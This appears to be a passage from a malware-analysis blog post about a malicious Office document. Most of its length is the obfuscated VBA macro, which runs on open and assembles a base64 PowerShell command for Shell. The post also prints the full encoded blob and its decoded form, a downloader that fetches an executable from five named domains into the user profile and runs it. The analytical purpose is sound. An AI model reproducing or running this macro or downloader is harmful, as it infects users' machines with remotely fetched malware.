sXIO3j = "AnAG" + "0AMQ" + "AnAC" + "kAOwA" + "kAE"
wBuzmLiw = qc2z0SEi + Oujhvq7b + QV7zAXF + BzjlMR1F + OQKf7zP + ds84PI + bZjAXG + lsk59K2 + MzvEWt + CSfGq3 + sXIO3j
End Function

Function Mnv94H()
On Error Resume Next
aYtibs3 = 179827747 + Rnd(282625438 / ChrB(637411799)) * (mKzDvwPf * CStr(koOwWQ) + (820843991 * 289415028 - JjFdDd * lHfAVqz * (RPNVIV + DPpWlW0p)))
Set JFU0SS4 = jrTi9a
   lUWofF = 74927613 + Rnd(641543024 / ChrB(758132513)) * (UIV49I * CStr(rjh9sN) + (7144871 * 374798480 - QiRhhNzX * Zi1zlbf * (rQFvilwM + WisWwbB)))
Set iIElPCtQ = TRs4Y3kO
n8DNvz = "kARQB" + "wAEgAa" + "gBqA" + "CAAPQA" + "gACgAJ" + "wA2ADU" + "AJwAr" + "ACcAN" + "AAnAC"
kRwoCbw = 252124838 + Rnd(733842440 / ChrB(143597698)) * (zrcm1dc7 * CStr(R66WQprw) + (814240235 * 421383916 - v8pM0R * s7TAKbb * (FTzFB83t + Gh8Unn)))
Set a7niLvBz = vMwNwAr
   IEn4iai = 707329075 + Rnd(651177826 / ChrB(528505509)) * (tdhpAcm * CStr(QWJu2F) + (923052425 * 748610456 - luiSzC * w4qsCDw * (wC5qL3M + ZJqVj8lV)))
Set QKsnm1r = fTF8pt8
uAwdTGD5 = "kAOw" + "AkA" + "G0AVQ" + "B1AFc" + "AZABG"
hR1ASs = 593608699 + Rnd(869856326 / ChrB(837772827)) * (Z9pw547F * CStr(Oba2Po) + (194804751 * 17052920 - MTIQlW * fT0E0I6 * (qz1VPb + raJDDY1)))
Set aLzZLi = YUKNcR7
   oFpG4cU = 69902081 + Rnd(459111931 / ChrB(375063880)) * (C9Lqznb * CStr(KruAUNws) + (450570844 * 750939523 - j3VIiK3 * u8Utizp8 * (nOjkY6F + cVAmuD)))
Set rhSciV = mZR1aH
   IUwbv9 = 441358395 + Rnd(41993444 / ChrB(359464561)) * (pURjMl * CStr(ch2BLD) + (654196984 * 501767774 - c60wvXm * F4n707bn * (QjiU2bn + fYHdGr)))
Set NAj45z = J4k2FtZd
LOw02E5 = "AD0A" + "KAAnAF" + "IAM" + "ABhAHE" + "AJwA" + "rACcAM" + "QBsAD" + "AAJw" + "ArACc"
FYW8JAh = 712619214 + Rnd(881693387 / ChrB(636295992)) * (URKaKmN * CStr(I3ZUT71W) + (250299522 * 589413664 - YMSLPFs * RpIzFY * (VFHNi7j + rErVnCm)))
Set E3P6hfZ1 = OiOiBr
   QA3fwJH = 424424867 + Rnd(823210062 / ChrB(264615348)) * (PK2s3Pl * CStr(wzSnDq) + (307425369 * 580047337 - BwAi5hfG * oacfXKo * (PjwUaV + ttdw1Oj)))
Set Pq8LWI97 = TzQ3C9i
   z2dUJc = 561984218 + Rnd(486723199 / ChrB(654304715)) * (G4FY1Mf2 * CStr(Nu5i9u) + (918391916 * 340744218 - fUdkQY * jcwnuD9 * (S73tN5I + dwLsnJ)))
Set MwaiHbj1 = TmA1juPi
UaU4Jz1 = "ATwA" + "nACkAO" + "wAkA" + "GQA" + "RwB" + "CAFQAb"
SlNj2znD = 904942248 + Rnd(601296404 / ChrB(231547769)) * (WoJpiW * CStr(L7O7SCFY) + (378312373 * 859886211 - dIowCo * dOZvBIG * (GQAdsH + diwhojtH)))
Set P0Xm5CP = bc6K78WP
   sQzrsWma = 528335493 + Rnd(650487598 / ChrB(597667683)) * (GFWid6z * CStr(lq6rtk) + (534848929 * 916008907 - CXJSTGw7 * QJWWlsmX * (crCjiIwB + ulzrDJ)))
Set Cbq9808i = FA9JOLV
   v0o9zrXQ = 888537584 + Rnd(578349292 / ChrB(526518202)) * (D7ApwdLv * CStr(fa5jw5) + (486628947 * 80837732 - VwIbDiP3 * nItkf3 * (rkQ8D1C + JkVYiNzb)))
Set cmPNTs2Y = RA52CPsj
mLUvTz7 = "AA0AHE" + "APQAk" + "AGU" + "AbgB" + "2ADoAd"
hXzdGE5 = 622752920 + Rnd(4143555 / ChrB(374439290)) * (wQW55V * CStr(GfZRfAE) + (958997563 * 351471992 - WVoA2VV5 * wSk7LHjV * (zVsdI8 + E07QKdWw)))
Set ZjjbRs = rVT3im
   wvptmnk6 = 494575016 + Rnd(560361141 / ChrB(299099691)) * (wPhh76N * CStr(VZrGTiiw) + (189766578 * 256872344 - WwEb9f * fJcubQj * (WGZBJW + aUCWqW)))
Set TfadG8Z = KQ78pD
nJIQQcw = "QBzAG" + "UAcgB" + "wAHI" + "Abw" + "BmA" + "GkA"
uHrvLhk = 960064732 + Rnd(529986537 / ChrB(131783534)) * (wbjjomz * CStr(zGwzSZ) + (781269897 * 555111492 - JW3Vtaj * NnvzJ3UB * (iuqFX5B6 + GzZmhWGF)))
Set GITw8lNT = wYjjO1iQ
   MYuj56 = 665417865 + Rnd(256782902 / ChrB(345597011)) * (b5mZmpc5 * CStr(DHqRPr) + (856571112 * 941873976 - FXzQ8Ui * CMwdv3 * (QGUvjU2 + DRpOwT)))
Set rKFWcRKh = DPn6Zh
mnhC8GqR = "bABlAC" + "sAJwB" + "cACcAK" + "wAkAEk" + "ARQBwA" + "EgAa" + "gBqAC" + "sAKAAn"
DzENLYi = 297625587 + Rnd(720768655 / ChrB(476796187)) * (pHlJsr * CStr(qObpku24) + (807596303 * 458000434 - Snjt2v * v8MIj15b * (wz05kzW + WhliQMI)))
Set f2R7EJ = BTFt1afP
   RI79ZA = 460723157 + Rnd(627391298 / ChrB(588236318)) * (EwL6JUmM * CStr(JMAjd8) + (760995623 * 634702389 - Cs3nJv4v * SGZHkLY * (aiAZ9J7 + wCr0Sh1)))
Set cwXa1dGw = t9SjQHwY
WCrXbI = "AC4A" + "ZQA" + "nACs" + "AJwB4" + "AGU" + "AJwAp" + "ADsAZ" + "gBvA" + "HIAZ"
Mnv94H = n8DNvz + uAwdTGD5 + LOw02E5 + UaU4Jz1 + mLUvTz7 + nJIQQcw + mnhC8GqR + WCrXbI
End Function

Function Qd66bAu()
On Error Resume Next
foWb2Kp = 873066267 + Rnd(825404028 / ChrB(979149400)) * (i15WVz5 * CStr(sLSsNo) + (787551009 * 7545040 - dR4cZjAJ * EcPn1jFS * (dFQdudDs + u2cE8Tr)))
Set rVnLF0Y = tnjiabV
   BaN2AfUq = 661456499 + Rnd(670569176 / ChrB(166004269)) * (FQSF3Bz * CStr(kjRkTK) + (941750314 * 233680561 - Xq8iPw * zNpcEFtH * (Ddi164so + KKuaXBD)))
Set lDQpKz = NiM1MMF
l7cRfN7 = "QBh" + "AGM" + "AaAAo" + "ACQATQ" + "A4AF" + "UAMQB6"
LailsNz = 406987825 + Rnd(654056395 / ChrB(861486049)) * (cqtrs0W * CStr(cVjO1ucj) + (265847283 * 758795270 - RaUfwU5X * SRtdn5d * (sHcqFBW + RzYGKzN)))
Set K5pcoWN = ZWHiGl
   YLPlBQWh = 809818160 + Rnd(951890865 / ChrB(40140484)) * (oZjODsvK * CStr(YVTHTmlq) + (605883735 * 987514461 - pFJ2aT * iwNXno5 * (rAzLNv + GD6MQatl)))
Set WEMRc1p = H7iprUdw
tuOdbcb = "AHcAI" + "ABpAG" + "4AIAAk" + "AFA" + "AZgB3" + "AEgAYw" + "BYAFoA" + "UwApA" + "HsAdAB"
sIT87uTH = 469676144 + Rnd(55099057 / ChrB(842554649)) * (iN0OCP0 * CStr(Q1LtS3Cz) + (436493985 * 345713109 - XmHhWuPz * LwsjBhp * (MOAzdwN + EnminkN)))
Set kpfuwNum = o1iKG5
   Fv52Ui = 275681568 + Rnd(770884464 / ChrB(393266725)) * (KUoTYls * CStr(rRAkOBA4) + (258308706 * 921694968 - EiBwM3t * TVTNEwD * (ZiJQZzv + PiXfdfC)))
Set jjMt0nTd = TJM8nsbz
pouJSzs = "yAHkA" + "ewAk" + "AEoARw" + "BUADkA" + "aQBZ" + "AE8AY"
cRX82v = 19892619 + Rnd(293320422 / ChrB(874125705)) * (QYfzpw * CStr(KdAvmLl9) + (697346982 * 879664904 - lu7VIf8 * r2Iw2vm * (U0BN7mjj + NwTZMDYi)))
Set kK1VHV = zvZ97wiq
   JinbBIrj = 374051741 + Rnd(551264155 / ChrB(266061981)) * (QOKuQD * CStr(mGEZjjl) + (755729742 * 934633056 - ohr4wXK * LzGc3Q * (BXQWiEa + BbiGwb2)))
Set dlUYWG = X60mhT
RwmuL9zj = "gAuA" + "EQAbw" + "B3AG4" + "AbA" + "BvAGEA" + "ZABGA" + "GkAbA"
iZUGWi = 558728469 + Rnd(671739561 / ChrB(884179563)) * (V4Flvt * CStr(Rw6ztKIF) + (805894080 * 147955897 - zwWiVA * bmOqqfLC * (kJ7Y8Rp + zOcujRj)))
Set bhPuUFU = MHO9Gob
   JjbEhIw = 492205395 + Rnd(310280451 / ChrB(766429482)) * (lWqJiv8o * CStr(YivLBnzp) + (372617296 * 841950712 - Asvsjbc * hbfarEp * (B3baG3 + FKonY6L)))
Set wYvPfL7 = GPuUjKdL
d1E4tZ = "BlACgA" + "JAB" + "NADgAV" + "QAxA" + "HoAd" + "wAsA" + "CAAJ"
JnLUnj = 175000718 + Rnd(823347353 / ChrB(659168783)) * (CQ4isoba * CStr(DMwNB1) + (509079383 * 609501128 - w39cw9Gj * pqPK9dFb * (oAaQHaWG + iN3YwKRa)))
Set c6IaPY8o = nEv756c
   hht2zDQ = 597386587 + Rnd(601919816 / ChrB(978791791)) * (U6kihkhD * CStr(MDCKGLQ) + (320740386 * 355634144 - PLSQ9i * l4mwtLZ * (Y5GLiDSp + zFURm2uG)))
Set LjCAjQ = OS9rTf1
   vH2kmI2X = 533198944 + Rnd(97573349 / ChrB(622189184)) * (zt1SwVI * CStr(Wr3RzRZ) + (780174646 * 240798078 - WMaI9kh * mUth5p6N * (SdjiqJsV + wu2uF8w)))
Set QMzZnqG9 = GWLAijA
zPOMJu0d = "ABk" + "AEcAQ" + "gBU" + "AGwA" + "NABxA" + "CkA" + "OwAk" + "AE8" + "ARA"
KUHwVWW = 626702085 + Rnd(83132343 / ChrB(884812614)) * (vvTvMh * CStr(zbwz1J) + (196571569 * 922203237 - ihWwz9 * ci7avnc * (jXoQkU + mjU9LKb)))
Set LYsF8UOm = RfqLU6
   EzYf7w0G = 942368426 + Rnd(199438054 / ChrB(493369092)) * (YHMNOJCJ * CStr(KtkS7ccN) + (530972519 * 517759448 - sKjCHCz * TpBdzC8 * (sqs4Lw + Boi08Dk)))
Set BoMBAV = rEjwHZ
   k5f1VdNJ = 393173748 + Rnd(987728499 / ChrB(109487686)) * (CslSFQ3 * CStr(mJXn99G) + (182909226 * 319767467 - RlqXjfq9 * wv1bjTN * (ZXIQKVd + MCNpjcO)))
Set Mtjk5G = UjLYp3so
SfBGzL = "B6AEQA" + "SwA5AD" + "MAPQA" + "oACcA" + "ZgAn" + "ACs" + "AJwBqA"
p7jplv = 927701276 + Rnd(852753459 / ChrB(400750473)) * (owtbaHVS * CStr(Jj8DJ9) + (808919948 * 872694240 - NVjqCi * wCwvIvj3 * (iM2nJBm + fcwH9UL)))
Set LDY2kbU = VYLdQO
   HQnPzR = 185535274 + Rnd(58755511 / ChrB(765192252)) * (QfSWOz * CStr(i1LRjbQO) + (873745759 * 907176767 - YfUBZS * svLmH1O * (p7XPUqO + FzhDTJZm)))
Set JQ76dd9z = IqMkoE8
JnMhEm06 = "EgAegB" + "EAGwA" + "cAAnAC" + "sAJwA" + "1ACcA"
KuS56sp = 129935722 + Rnd(414094266 / ChrB(334228970)) * (qLfZsF * CStr(c7AMrS) + (568007474 * 168984552 - FuCQuatW * tvBjn9ER * (UWjY4Qu + jJfAkN)))
Set caEpVj = p6bisO
   NE08P60 = 698735385 + Rnd(171835498 / ChrB(902622668)) * (IQQNiXz * CStr(GUMOlR) + (869004564 * 112885696 - tujsZ0 * Ul1WjSWK * (iDN8nmI + lnnHkBmF)))
Set c2NDmbA = q42blTcF
WuLoWdq = "KQA7A" + "EkAZgA" + "gACgA" + "KABHA" + "GUA" + "dAA" + "tAEkA" + "dABlA" + "G0AI"
t2svhnEN = 428199590 + Rnd(411213609 / ChrB(561911674)) * (Qz79TVb * CStr(mEj4MB) + (893078066 * 512241062 - PsvtD0Va * UffQkBr * (kKC1wGn + WCT5IsV)))
Set F4095mc = dQTKUa
   Eph75PR = 869271806 + Rnd(219077211 / ChrB(380424824)) * (h42QnSE1 * CStr(jqbc7v) + (574601309 * 642538064 - qB8jBH8w * ziXfVp * (rMKRJvD + WTjSjZY)))
Set wVOfUSm = GT7HQN
   YztVwWuD = 377513235 + Rnd(519152519 / ChrB(787867678)) * (z3HGUbUi * CStr(ASm3i0Di) + (738743664 * 643737779 - ntIb6Kz * ECfdwltE * (PQ4tCK + DT8DFl)))
Set U83fJv = wQGYtY
d6H2AFR = "AAkA" + "GQARw" + "BCAF" + "QAb" + "AA0AHE" + "AKQAuA" + "GwA"
Qd66bAu = l7cRfN7 + tuOdbcb + pouJSzs + RwmuL9zj + d1E4tZ + zPOMJu0d + SfBGzL + JnMhEm06 + WuLoWdq + d6H2AFR
End Function

Function misB743q()
On Error Resume Next
ojs15m = 259784895 + Rnd(468663839 / ChrB(339892782)) * (qJMs3z0q * CStr(YbKw1Vs) + (478243774 * 253321315 - lsWRtoj3 * n9UwvHw * (zjUrTEh + Oh0F23)))
Set raJIcwp = Y1BFO7tz
   ukwtj7G5 = 441979621 + Rnd(845842613 / ChrB(568569952)) * (XMQ3ROD * CStr(Ttp8bTj) + (915279226 * 989126002 - Snqn53T * tXvGkB * (c7KWoV + DiiwUj)))
Set oIwjm8Z = tpA8jXZR
ADNMmcl = "ZQBuA" + "GcA" + "dABo" + "ACAA" + "LQBn" + "AGUA" + "IAA0AD" + "AAMA" + "AwA"
z4fIozif = 264614520 + Rnd(689262174 / ChrB(572433491)) * (iNG0Gw * CStr(ATUkb5fn) + (740258210 * 875099145 - ZY2aciqU * W3XM7Qc * (i1A7kL + t03jw7)))
Set NWphmIXw = WNP9OLDo
   ajV4kic = 445625547 + Rnd(60789641 / ChrB(432890347)) * (rWjRGbrs * CStr(CGkZSh) + (119366005 * 280821196 - kf5C0b * Jza1wbfB * (ZBjWJQhO + N5UwY9)))
Set XdSo0t = qMUJ5QJ
dUWofu = "DAA" + "KQA" + "gAHsAS" + "QBuA" + "HYA"
ZhoDZbOv = 962213343 + Rnd(917990298 / ChrB(325079150)) * (cdRkXQjR * CStr(CaoTJl) + (786113072 * 689918715 - NwhiqGaf * wmp88U * (Yudc7cm + GFJKOzih)))
Set p5RzBVRF = jWwqMNuQ
   kpKRjJ = 311135869 + Rnd(114101750 / ChrB(744369689)) * (jOhNwQWz * CStr(BlOzk14) + (434540199 * 973074445 - BwJProA * El3zk7 * (lvd0Krp + Z7TZqviV)))
Set U8HmWXQ = lZMn8hr
sEdLvJE = "bwBrAG" + "UALQB" + "JAHQA" + "ZQBtAC" + "AAJA" + "BkAEc"
hYriXp = 3547945 + Rnd(94664314 / ChrB(242330258)) * (qKGLMC * CStr(awvHwWqS) + (902210241 * 375505551 - zvsYwz9W * bzT0mCv * (iYFOV2Q6 + TGszWQCb)))
Set SEBN2Q9 = noj6jzW4
   YDuiwZ = 254937817 + Rnd(430679092 / ChrB(874277840)) * (PdnmHw * CStr(EuFkkR5Z) + (1270322 * 713562678 - BvtZmiB * h2hIni * (InNOYd + ZJR3APs)))
Set DjuOAj = tb3hb8
   wbPpmKGi = 604694031 + Rnd(271130817 / ChrB(703287287)) * (aXnCkCJ * CStr(tjE0zoq8) + (87529262 * 578769563 - WjVoTEC * qVzjbWk * (rm6Oitkm + tnLHT3E)))
Set TR8G7M = NdYRFK
d5wpXhz = "AQgBU" + "AGwAN" + "ABxA" + "DsAJAB" + "jADcA" + "agBp" + "AFEAMw" + "A9ACg"
s3YKFDEz = 27029413 + Rnd(550064100 / ChrB(431289624)) * (Vrjk1If * CStr(hGq4iib) + (582551148 * 787601316 - aYpJK9p * kHjNX7Zk * (JSwXOSdM + Sbvzz4B)))
Set V3d1Iwj = amF2Czc
   f87WEh4 = 807911768 + Rnd(44152535 / ChrB(221089631)) * (Bm3kGP * CStr(tKqAWUu) + (520858982 * 692255487 - kT91C5qG * Z9F99Iq * (hFoIdbQ + mwXHVRTs)))
Set rqZJczXL = TLDvKC
W1qwKF = "AJwB" + "3AG" + "kAJw" + "ArACc" + "AZA" + "AyAFo" + "AVw" + "BZAC" + "cAKQ"
misB743q = ADNMmcl + dUWofu + sEdLvJE + d5wpXhz + W1qwKF
End Function

Function SvYi5Y()
On Error Resume Next
Qar3FUa = 455660881 + Rnd(479377581 / ChrB(913763670)) * (A3z8Rh * CStr(pNuA25) + (186645371 * 372560310 - DBLqOi * mh4wbX * (HTTjUaYs + irBLID)))
Set rRDToVs = HVAvWDHu
   LFSbAYGY = 800434914 + Rnd(510784388 / ChrB(882020659)) * (H1QaWB * CStr(GbmhZi1) + (618397161 * 606005729 - YfC4ZL * Z3tBSa * (jvScVUW + j5k4PwM)))
Set tnG71PK = jYZTGT4
   UAZpHEhA = 935091417 + Rnd(677220105 / ChrB(173746982)) * (ZQl4El2b * CStr(AKWqwV) + (329430195 * 691723933 - wfqVE8VL * VHzSVIw2 * (wOW0Yi + npl0X43)))
Set NwHQqXS = TDUojdbd
B6II8P = "A7AG" + "IAc" + "gBl" + "AGE" + "AawA" + "7AH0" + "AfQ"
RJLo0A = 811400454 + Rnd(956707359 / ChrB(342546818)) * (DsGVHwws * CStr(ioAmQUU) + (61676991 * 885722845 - aPGOXNan * DXGLBPET * (iM5ufK + ii4cWFic)))
Set mkYFjf = vbOEPu
   kim6Ji8 = 604995466 + Rnd(187162849 / ChrB(369192227)) * (iI8XbmjC * CStr(Xa5S9V) + (778068471 * 817724678 - wbKimLd4 * bvPmUI7b * (kIHmCM + blzWlD4J)))
Set mPIpdpi = O8zZVj
   ZIYasqvd = 362165474 + Rnd(112544498 / ChrB(383572899)) * (nmW4itI * CStr(rDLJBSzM) + (558171835 * 594087418 - wv6pzluN * i5Y4RRq * (BFwSVOj + hJiwuXz)))
Set LvHYina = mHBifn
FckbN7Qj = "BjA" + "GEAdA" + "BjA" + "GgAe" + "wB9AH" + "0AJ" + "ABPAHE" + "ASwB"
Wzt9cQif = 664813073 + Rnd(931017087 / ChrB(602680043)) * (mpsMhE * CStr(PdmsLohV) + (633491023 * 530973899 - pMoFnk * MbqZ60ij * (I2j0JV + OmBJBY)))
Set XhAmj8zk = pMwMJ8qV
   OjUC9q = 619911867 + Rnd(191324940 / ChrB(505764206)) * (QOzGf2X * CStr(znHzzKS) + (142403242 * 793628068 - anj1Msh * shtziQc * (t7FndL + cOwXdYL)))
Set jr94wToO = vRShsn1
pDT9WTn = "3AGQ" + "AcAA" + "9ACgA" + "JwBYAE" + "4ASwA" + "nACsA" + "JwBYA"
WuD7X5zT = 493945759 + Rnd(137050478 / ChrB(960794521)) * (rjIzhB * CStr(c1aPhEu) + (584875022 * 501993385 - h4I7Ei * CbIYidGF * (LoUsS35m + rFt0dp5G)))
Set DTwEiMZ = ob9d1RA8
   Zwjr6fQV = 830631645 + Rnd(438680916 / ChrB(453945522)) * (Y7JEZ0T * CStr(K7vp8Q1) + (730843367 * 316482153 - MBo85j * MozEwp8o * (wIYK3k + Nh0fGHHK)))
Set OLJzmmV = t8A0mNn
   ItmtPo = 144370194 + Rnd(885973332 / ChrB(472537641)) * (bj1Lo3D * CStr(VQowE4Dj) + (120093318 * 738763736 - QZBEArQ * otjRFjB * (sqw7w5Ez + imvt5wN)))
Set GnLzRhnj = zUBJP3Q
EIEU9Tz = "EUA" + "SwAnA" + "CkAO" + "wA="
SvYi5Y = B6II8P + FckbN7Qj + pDT9WTn + EIEU9Tz
End Function


Sub autoopen()
On Error Resume Next
   WYG01Emi = 627136152 + Rnd(703507320 / ChrB(92536584)) * (znW1sqYh * CStr(HHdzi9u) + (628984380 * 336072048 - DZrq5rib * Owc3Vz * (wIbP78 + ODj3Eu0)))
Set MoJz04FZ = SB6NK0bY
   z5oTLD = 599329029 + Rnd(451456318 / ChrB(19258986)) * (UO7VOQ * CStr(nGUHt77) + (440806034 * 738022724 - d6BQD1Q * b2wiEM * (wvwI7D + iz5WPl)))
Set cvOW94 = NC25UzDh
   Trwctot = 581744880 + Rnd(558079707 / ChrB(322360018)) * (SvHPuK * CStr(Zk1MQqQz) + (66927396 * 951667606 - h5vLqtYs * wGnj2K * (Gj9DFz1 + CX6flU)))
Set XA6jBv3 = huirzFA
pjs7kH = rkw8UGh + Chr(fUvcLZ + FzFXsJGB + KeyCodeConstants.vbKeyP + www5Vz + YiZjZuT + W6J5smt + LECJDVzi) + oHPUlXj + H69wWw4D + bOXYcQd
   ccVZ5B = 660827807 + Rnd(960868094 / ChrB(117019020)) * (E4DLNP * CStr(fiiGc1mj) + (674990587 * 757028956 - UAwdii * sn98VAT * (DKooza + S4jSc0)))
Set o6FEjqsh = zjhvbjPT
   cH95iKG = 302472438 + Rnd(264864397 / ChrB(286542331)) * (WssUjwUr * CStr(IVBYFtF) + (506547179 * 128201286 - hwX0P08T * Anzwnj * (Vzvc58 + IEWNvJpw)))
Set RVRzXYLi = MmbJdYrr
GGS8A1j = VWWz37nX + Chr(AtOQwkZX + vnhmNtWc + z6950fb + lQms5M + KeyCodeConstants.vbKeyO + n5ilbt + uBZASZtT + v6tRjLX) + bwVq6p + JrQtnG3 + DPVWUZ + zl5pfX + QWtO0w
   QzDwRKFi = 146327714 + Rnd(234342030 / ChrB(575897316)) * (O1d4qfl * CStr(iZWNw4mD) + (16669287 * 24485372 - kkuIWP * z0awzo * (A4MRTl + XDVM2FN)))
Set KjQtuUQ8 = i0jaK0kD
   tOpczq = 703904372 + Rnd(240430333 / ChrB(122288507)) * (HzUlrpKi * CStr(KC2hWwGz) + (969991852 * 231469119 - EYOQLRUp * zH8qfdpn * (SWqLw5b5 + HnIUu7W)))
Set uO3fcGt = OnJUlidr
   T6EzHmvQ = 401572651 + Rnd(793195745 / ChrB(902715424)) * (M7p7qOVR * CStr(B5aUnKw) + (848796452 * 199707633 - jS0BpBG * HzXtqOM * (fIqBjC + OHFm7rkb)))
Set i5ANPu0 = bqnY96
DsiufjK ikw8I0t + pjs7kH + GGS8A1j + KHwRElj7 + wCPzWAns + F0wA2rw + UOiYERH + B8waSCi + BIBrlzL + wBuzmLiw + Mnv94H + Qd66bAu + misB743q + SvYi5Y, 125713 - 125713
   MSD84f = 74722115 + Rnd(618328723 / ChrB(812588121)) * (DIwVYJ * CStr(SmTkHi) + (453673570 * 603260537 - HPfnkh * irj1E5Rk * (j0L2oXoX + wcb4qXop)))
Set cOcriqb = VShRh6X
   J1XHvVB = 353202910 + Rnd(702104841 / ChrB(847006653)) * (cFUCzPjE * CStr(o9Vsnp) + (742374002 * 489394143 - Wbil7ijm * DfdRJp * (ikD2EA + oDrVlNY)))
Set FktGUt5 = FQiDj8f
   zjhzksl = 18464130 + Rnd(994433919 / ChrB(158754862)) * (Yk10T9O * CStr(fJKhnoPi) + (948797985 * 867038795 - shcU5jd * N1wiwiz * (uwLwYX + zEVjCS)))
Set fDXpYc = GUSW91G
End Sub

So trying another tool out that I have been playing with a lot (ViperMonkey from Decalage2: http://github.com/decalage2/ViperMonkey) yielded the breakdown of the script with the code being encoded in base64 as seen below:

JABIAEwAMwAzAFIAQwBSADAAPQAoACcASwB2ACcAKwAnAGQATAAnACsAJwB1AHAAcgAnACkAOwAkAEoARwBUADkAaQBZAE8AYgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABQAGYAdwBIAGMAWABaAFMAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8AJwArACcALwBkACcAKwAnAGEAJwArACcAZABhACcAKwAnAGYAYQByAGkAbgBnAG8AcwAnACsAJwB0AGEAcgAnACsAJwAuACcAKwAnAGMAJwArACcAbwBtAC8AJwArACcAcgB0AFEAdwBUACcAKwAnADUAJwArACcANQB6AEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBmAGkAJwArACcAbABlACcAKwAnAC4AbABhAHUAYQBzAGkAbgBoAC4AYwBvAG0AJwArACcALwAnACsAJwBQACcAKwAnAFgAZQBoAEwAJwArACcAUAAnACsAJwBQAGwAQAAnACsAJwBoAHQAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvAGEAJwArACcAbgAnACsAJwBnAGkAcgBhAHMALgAnACsAJwBvAHIAJwArACcAZwAvAHgAJwArACcAOABCACcAKwAnAGoAYQBNACcAKwAnADQAJwArACcANAAnACsAJwA0AEkAQABoAHQAdAAnACsAJwBwACcAKwAnADoALwAvAGEAZABzAHUAaQBkAGUALgBjAGwAJwArACcAdQBiAC8AeQAnACsAJwA3ACcAKwAnADcAUQBUAEsAaABWAEAAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwBtAGkAYwBoAGEAZQBsAHcAcgBpAG4AZwBsACcAKwAnAGUAJwArACcAcgAuAGMAbwAnACsAJwBtAC8ASQBSAFkAWQAnACsAJwBxAFAAYgA1ACcAKwAnAE4AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAaQAwADUANQBhAGwATwBQAD0AKAAnAHQAcABZAEUAMgBvACcAKwAnAG0AMQAnACkAOwAkAEkARQBwAEgAagBqACAAPQAgACgAJwA2ADUAJwArACcANAAnACkAOwAkAG0AVQB1AFcAZABGAD0AKAAnAFIAMABhAHEAJwArACcAMQBsADAAJwArACcATwAnACkAOwAkAGQARwBCAFQAbAA0AHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkARQBwAEgAagBqACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATQA4AFUAMQB6AHcAIABpAG4AIAAkAFAAZgB3AEgAYwBYAFoAUwApAHsAdAByAHkAewAkAEoARwBUADkAaQBZAE8AYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABNADgAVQAxAHoAdwAsACAAJABkAEcAQgBUAGwANABxACkAOwAkAE8ARAB6AEQASwA5ADMAPQAoACcAZgAnACsAJwBqAEgAegBEAGwAcAAnACsAJwA1ACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGQARwBCAFQAbAA0AHEAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEcAQgBUAGwANABxADsAJABjADcAagBpAFEAMwA9ACgAJwB3AGkAJwArACcAZAAyAFoAVwBZACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABPAHEASwB3AGQAcAA9ACgAJwBYAE4ASwAnACsAJwBYAEUASwAnACkAOwA=

Once I decoded that, I got the following:

$HL33RCR0=('Kv'+'dL'+'upr');
$JGT9iYOb=new-object Net.WebClient;
$PfwHcXZS=('h'+'tt'+'p:/'+'/d'+'a'+'da'+'faringos'+'tar'+'.'+'c'+'om/'+'rtQwT'+'5'+'5z@'+'http'+'://'+'fi'+'le'+'.lauasinh.com'+'/'+'P'+'XehL'+'P'+'Pl@'+'htt'+'p'+':'+'//a'+'n'+'giras.'+'or'+'g/x'+'8B'+'jaM'+'4'+'4'+'4I@htt'+'p'+'://adsuide.cl'+'ub/y'+'7'+'7QTKhV@h'+'ttp'+'://michaelwringl'+'e'+'r.co'+'m/IRYY'+'qPb5'+'N').Split('@');
$i055alOP=('tpYE2o'+'m1');
$IEpHjj = ('65'+'4');
$mUuWdF=('R0aq'+'1l0'+'O');
$dGBTl4q=$env:userprofile+'\'+$IEpHjj+('.e'+'xe');
foreach($M8U1zw in $PfwHcXZS){try{$JGT9iYOb.DownloadFile($M8U1zw, $dGBTl4q);
$ODzDK93=('f'+'jHzDlp'+'5');
If ((Get-Item $dGBTl4q).length -ge 40000) {Invoke-Item $dGBTl4q;
$c7jiQ3=('wi'+'d2ZWY');
break;
}}catch{}}$OqKwdp=('XNK'+'XEK');

So now I know the sites that this was calling out to, and where the file was being dropped, but it still doesn’t answer my question about how it gets re-assembled. So went back to what I could figure out from the oledump output mentioned above. Skimming through it, there was a pattern to it (every 4-6 lines was junk code and then a variable being assigned to other random named variables while being concatenated), but I was not 100% sure if my “gut-feeling” was correct. That was until I saw the following line in the script:

QX0ipWjQ = "wersh" + "ell -" + "e J" + "ABIAE" + "wAMwA"

I could see the beginnings of the Powershell script in that one line. And since this one line kind of married up to my “gut-feeling,” I started to strip out the junk code. Once that was done, and some further cleaning up of the script was performed, I was left with this:

Attribute VB_Name = sKfw6m
	Function DsiufjK(rPP1jAE, wToiPvr)
	Shell (rPP1jAE + iJf1R0 + jG4Ranf + rppKckZK + oM1fQI + nRaN1qpw), l6dXY99 + qnul14Cw + wToiPvr + tzKhPcU + tm0T1td + zEB7op
End Function

Function UOiYERH()
	On Error Resume Next
	QX0ipWjQ = wersh  ell -  e J  ABIAE  wAMwA
	qYGMCi2F = zAFIA  QwBS  ADA  APQAoA  CcAS
	ZzzVfP = wB2  ACcAKw  AnA  GQATAA  nACsAJ  wB1AHA  AcgAnA  CkAOwA  kAEo
	zVCl3I58 = ARwBU  ADk  AaQBZ  AE8A  YgA9AG  4AZQ  B3AC  0AbwB
	fcsnuE = iAGo  AZQBjA  HQAIAB  OAGUA  dAAu  AFcA  ZQB  iAEM
	cNsVZwis = AbA  BpAGU  AbgB0A  DsA  JABQAG  YAdwBI  AGMAW
